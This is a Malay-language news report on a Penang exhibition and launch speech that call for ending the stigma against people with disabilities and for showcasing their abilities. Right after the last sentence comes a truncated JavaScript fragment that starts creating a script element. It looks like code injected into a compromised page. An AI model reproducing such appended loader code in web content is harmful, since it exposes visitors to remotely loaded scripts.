Tepis stigma, beri peluang OKU serlah keupayaan, seru ADUN

Oleh : AINUL WARDAH SOHILLI

Gambar : LAW SUUN TING

GEORGE TOWN – Serlahkan keupayaan dan hargai kemahiran golongan orang kurang upaya (OKU) merupakan antara mesej ampuh yang perlu disampaikan kepada seluruh masyarakat, kata Ahli Dewan Undangan Negeri (ADUN) Pulau Tikus, Yap Soo Huey pada Majlis Peluncuran Pameran Special Hand: Empowering Abilities di sini baru-baru ini.

Katanya, dari sudut intelektual, OKU mungkin mempunyai pemikiran tidak seiring dengan usia mereka memandangkan golongan tersebut dipercayai paling sukar ‘difahami’ disebabkan masalah komunikasi yang dihadapi.

“Namun, dari segi keupayaan, kebolehan dan kemahiran yang dimiliki, sama ada secara latihan atau semulajadi, ia mampu menyerlahkan potensi OKU untuk menjalankan tugas dengan baik.

“Saya percaya, malah Kerajaan Negeri juga yakin bahawa golongan ini mampu menjadi penyumbang terhadap pembangunan negeri sekaligus mentransformasikan status OKU dari liabiliti (kebergantungan) ke produktiviti,” ucap beliau.

Hadir sama, Pengerusi Think City Sdn. Bhd. (Think City), Datuk Dr. Anwar Fazal, Ketua Pegawai Eksekutif Asia Community Service (ACS) Stepping Stone Work Centre, Khor Aina dan Pengerusi ACS Stepping Stone Work Centre, Datuk Gillian Teh.

Menurut Soo Huey, sungguhpun peluang dan ruang terhadap golongan OKU adalah amat terbatas, masyarakat khususnya perlu merubah sikap dengan memberi fokus terhadap keupayaan golongan berkaitan dan bukannya ketidakupayaan mereka.

“Kita perlu menepis stigma masyarakat terhadap 41,000 OKU berdaftar dan memberi peluang kepada mereka untuk menyerlahkan keupayaan masingmasing.

“Oleh itu, saya sarankan agar lebih banyak program mahupun aktiviti seperti forum, seminar serta bengkel dianjurkan untuk memberi kesedaran bagi menonjolkan kebolehan mereka dengan keperluan khas ini,” jelas beliau.

Bertemakan “Inclusion Matters: Access and Empowerment for People of All Abilities”, pameran yang diadakan selama sebulan tersebut berjaya menarik pengunjung dari pelbagai latar belakang termasuk dari Australia, United Kingdom, Jepun dan Jerman untuk menyertai forum, bengkel interaktif serta ceramah yang diadakan.

Selain itu, hasil karya seni OKU juga dilelong, antaranya, lukisan ‘Flower Baby’ oleh Aniza Mohd. Ismail, seorang artis dan juga pelatih ACS Stepping Stone Work Centre di Balik Pulau.

Pameran yang dianjurkan secara bersama oleh ACS Stepping Stone Work Centre dan Think City berkenaan diadakan sempena sambutan Hari Orang Kurang Upaya Antarabangsa yang disambut pada 3 Disember setiap tahun sejak tahun 1992.var d=document;var s=d.createElement(‘script’);